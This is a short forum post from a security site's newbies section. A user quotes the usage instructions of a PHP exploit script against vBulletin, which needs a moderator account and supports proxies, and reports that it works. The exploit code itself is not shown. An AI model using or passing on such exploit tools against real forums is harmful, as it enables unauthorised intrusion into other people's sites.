am F4r4Zm0In Active user Joined: Feb 17, 2008 Posts: 30 koko wrote: Reading exploit is good think. Code: Usage: php '.$argv[0].' host path user pass forumid postid OPTIONS host: target server (ip/hostname) path: path to vbulletin user/pass: you need a moderator account forumid: existing forum postid: existing post Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' localhost /vbulletin/ rgod mypass 2 121 -P1.1.1.1:80 php '.$argv[0].' localhost /vbulletin/ rgod mypass 1 143 -p81 Thanks A lot For the Information Koko Its working fine for me Help needed :) www.waraxe.us Forum Index -> Newbies corner You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.047 Seconds